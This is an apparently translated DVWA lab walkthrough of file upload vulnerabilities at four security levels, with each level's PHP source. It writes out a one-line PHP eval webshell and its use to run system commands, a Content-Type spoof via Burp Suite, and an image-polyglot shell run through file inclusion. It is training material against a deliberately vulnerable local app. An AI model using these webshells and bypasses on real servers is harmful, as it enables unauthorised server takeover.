1.4 DVWA File Upload Vulnerability (Hands-On)

Low



First, let's look at the source code:
 
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // Can we move the file to the upload folder?
    if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
        // No
        $html .= '<pre>Your image was not uploaded.</pre>';
    }
    else {
        // Yes!
        $html .= "<pre>{$target_path} succesfully uploaded!</pre>";
    }
}
?>
This is the initial page:
Let's try uploading an image from the desktop:

It tells us the upload succeeded:

Now let's look at the path it reports:
../../hackable/uploads/1.jpg succesfully uploaded!
This is an absolute path, so we can enter the URL directly: http://127.0.0.1/DVWA/hackable/uploads/1.jpg
 
Now let's try uploading the file 1.php from the desktop,
whose content is <?php phpinfo();?>
We find the upload succeeds; the server applies no filtering or restriction at all:

 

We visit the uploaded path again: http://127.0.0.1/DVWA/hackable/uploads/1.php
 

 

This shows that a file upload vulnerability exists: PHP files can be uploaded and executed.
If we now upload a one-line webshell: <?php @eval($_GET['joker']);?>
and connect to it with China Chopper, we obtain a webshell on this server and gain initial control of it.
First we upload it:

After the upload succeeds, we visit it:

The page shows no error, which means the upload succeeded.

 
1. Now enter the URL:
http://127.0.0.1/DVWA/hackable/uploads/2.php?joker=system('type D:\\PHP\\wamp\\www\\DVWA\\php.ini');
It executes successfully; using this we can view every folder on the server.
 
2. Or open China Chopper and enter the path: http://127.0.0.1/DVWA/hackable/uploads/2.php
Select connect:

This way we can likewise access any folder on the server. Clearly, file upload vulnerabilities are extremely dangerous.

 

Medium level:

First, look at the source code:
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];

    // Is it an image?
    if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
        ( $uploaded_size < 100000 ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
            // No
            $html .= '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            $html .= "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        $html .= '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}
?>
Look at the code:
$uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) && ( $uploaded_size < 100000 )
These two lines check the uploaded file's type and size, so 1.php will presumably be blocked. Note that $_FILES['uploaded']['type'] is simply the Content-Type the client sent in the multipart request; the server never inspects the file itself.
Based on our experience at the Low level, let's try uploading 1.php:

Sure enough, the PHP file is filtered; the error says only jpg and png files are accepted.

Now we can capture the requests with Burp Suite to see how the successful and failed uploads differ:

First upload the normal 1.jpg; the request captured by Burp Suite is:

Then upload 1.php and capture the failed upload request with Burp Suite:

 
Comparing the two, the only difference is the upload type, so we intercept the request and change the type:
 

The rest is the same routine as the Low level and is not repeated here.

 


High level:

The source code is as follows:
<?php
if( isset( $_POST[ 'Upload' ] ) ) {
    // Where are we going to be writing to?
    $target_path  = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );

    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
    $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];

    // Is it an image?
    if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
        ( $uploaded_size < 100000 ) &&
        getimagesize( $uploaded_tmp ) ) {

        // Can we move the file to the upload folder?
        if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
            // No
            $html .= '<pre>Your image was not uploaded.</pre>';
        }
        else {
            // Yes!
            $html .= "<pre>{$target_path} succesfully uploaded!</pre>";
        }
    }
    else {
        // Invalid file
        $html .= '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}
?>

 

In other words, the Low and Medium level methods no longer work: the extension is now checked, and getimagesize() must recognise the file as an image, so neither a .php name nor an edited Content-Type header gets through.
 
1. At this point we wonder whether PHP can be disguised as a jpg to bypass the check, i.e. whether we can make a one-liner image shell.
 
  1. Use CMD to make the one-liner image shell.
  2. The /b switch copies and merges files in binary mode; used for image and audio files.
  3. The /a switch copies and merges files in ASCII mode; used for text documents such as txt.
  4. copy 1.jpg/b+1.php 2.jpg
  5. // This means: merge 1.jpg (in binary mode) with 1.php into 2.jpg
  6. 2.jpg is then the image shell.
The image shell is ready:

Opening it in Notepad++ we can see this line:

Then we can upload it:
Now we can make use of the file inclusion vulnerability (DVWA's fi module) and enter the URL:
http://127.0.0.1/DVWA/vulnerabilities/fi/?page=file://D:\PHP\wamp\www\DVWA\hackable\uploads\2.jpg
This way the PHP code contained in the image shell is executed.
The rest is the same old routine and is not repeated here.
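As an added illustration (not code from the original post or from DVWA), the Medium and High level checks above are modelled in Python over constructed sample uploads, alongside a body scan for PHP open tags that neither level performs; the function names and the sample bytes are assumptions, and the header check stands in for getimagesize().

```python
import re

# Constructed sample bytes (not real files): leading magic bytes that an
# image-header check would accept, followed by filler and, for the
# polyglot, the appended PHP that "copy /b" leaves at the end of the file.
JPEG_MAGIC = b"\xff\xd8\xff\xe0"
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
PHP_TAG = re.compile(rb"<\?(php\b|=)", re.IGNORECASE)
MAX_SIZE = 100000  # same limit as the DVWA source

# (label, filename, client-supplied Content-Type header, file bytes)
SAMPLES = [
    ("clean jpg", "1.jpg", "image/jpeg", JPEG_MAGIC + b"\x00" * 64),
    ("plain php", "1.php", "application/x-php", b"<?php phpinfo(); ?>"),
    # Medium-level bypass: only the header was edited in the proxy
    ("php with edited header", "1.php", "image/jpeg", b"<?php phpinfo(); ?>"),
    # High-level bypass: 1.jpg and 1.php joined into 2.jpg
    ("jpg+php polyglot", "2.jpg", "image/jpeg",
     JPEG_MAGIC + b"\x00" * 64 + b"<?php phpinfo(); ?>"),
]


def ext_of(name: str) -> str:
    """Mirror of substr(strrpos('.') + 1) in the DVWA source, lower-cased."""
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""


def looks_like_image(data: bytes) -> bool:
    """Rough stand-in for getimagesize(): only the leading bytes are inspected."""
    return data.startswith(JPEG_MAGIC) or data.startswith(PNG_MAGIC)


def medium_accepts(ctype: str, data: bytes) -> bool:
    """Medium level: trusts the client-sent Content-Type plus the size."""
    return ctype in ("image/jpeg", "image/png") and len(data) < MAX_SIZE


def high_accepts(name: str, data: bytes) -> bool:
    """High level: extension, size and image header; the body is never scanned."""
    return (ext_of(name) in ("jpg", "jpeg", "png")
            and len(data) < MAX_SIZE and looks_like_image(data))


def has_php_tag(data: bytes) -> bool:
    """Defender-side check missing from both levels: a PHP open tag anywhere."""
    return PHP_TAG.search(data) is not None


def audit(samples):
    """Per sample: which level would accept it, and whether PHP is inside."""
    return {label: {"medium": medium_accepts(ctype, data),
                    "high": high_accepts(name, data),
                    "php_tag": has_php_tag(data)}
            for label, name, ctype, data in samples}
```

The polyglot passes every High-level check yet still carries a PHP tag; only re-encoding the image, as the Impossible level does, actually removes the appended code, so the tag scan is an audit aid for existing upload directories rather than a substitute.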


Impossible level:

Let's look at the code first:
<?php
 
if( isset( $_POST[ 'Upload' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
 
 
    // File information
    $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    $uploaded_ext  = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
    $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
    $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
    $uploaded_tmp  = $_FILES[ 'uploaded' ][ 'tmp_name' ];
 
    // Where are we going to be writing to?
    $target_path   = DVWA_WEB_PAGE_TO_ROOT . 'hackable/uploads/';
    //$target_file   = basename( $uploaded_name, '.' . $uploaded_ext ) . '-';
    $target_file   =  md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext;
    $temp_file     = ( ( ini_get( 'upload_tmp_dir' ) == '' ) ? ( sys_get_temp_dir() ) : ( ini_get( 'upload_tmp_dir' ) ) );
    $temp_file    .= DIRECTORY_SEPARATOR . md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext;
 
    // Is it an image?
    if( ( strtolower( $uploaded_ext ) == 'jpg' || strtolower( $uploaded_ext ) == 'jpeg' || strtolower( $uploaded_ext ) == 'png' ) &&
        ( $uploaded_size < 100000 ) &&
        ( $uploaded_type == 'image/jpeg' || $uploaded_type == 'image/png' ) &&
        getimagesize( $uploaded_tmp ) ) {
 
        // Strip any metadata, by re-encoding image (Note, using php-Imagick is recommended over php-GD)
        if( $uploaded_type == 'image/jpeg' ) {
            $img = imagecreatefromjpeg( $uploaded_tmp );
            imagejpeg( $img, $temp_file, 100);
        }
        else {
            $img = imagecreatefrompng( $uploaded_tmp );
            imagepng( $img, $temp_file, 9);
        }
        imagedestroy( $img );
 
        // Can we move the file to the web root from the temp folder?
        if( rename( $temp_file, ( getcwd() . DIRECTORY_SEPARATOR . $target_path . $target_file ) ) ) {
            // Yes!
            $html .= "<pre><a href='${target_path}${target_file}'>${target_file}</a> succesfully uploaded!</pre>";
        }
        else {
            // No
            $html .= '<pre>Your image was not uploaded.</pre>';
        }
 
        // Delete any temp files
        if( file_exists( $temp_file ) )
            unlink( $temp_file );
    }
    else {
        // Invalid file
        $html .= '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    }
}
 
// Generate Anti-CSRF token
generateSessionToken();
 
?>
Let's try uploading an image, 1.jpg:
Every uploaded file is given a new random name, and the image is re-encoded with GD before being saved, which discards the appended PHP; as expected, our image shell no longer works.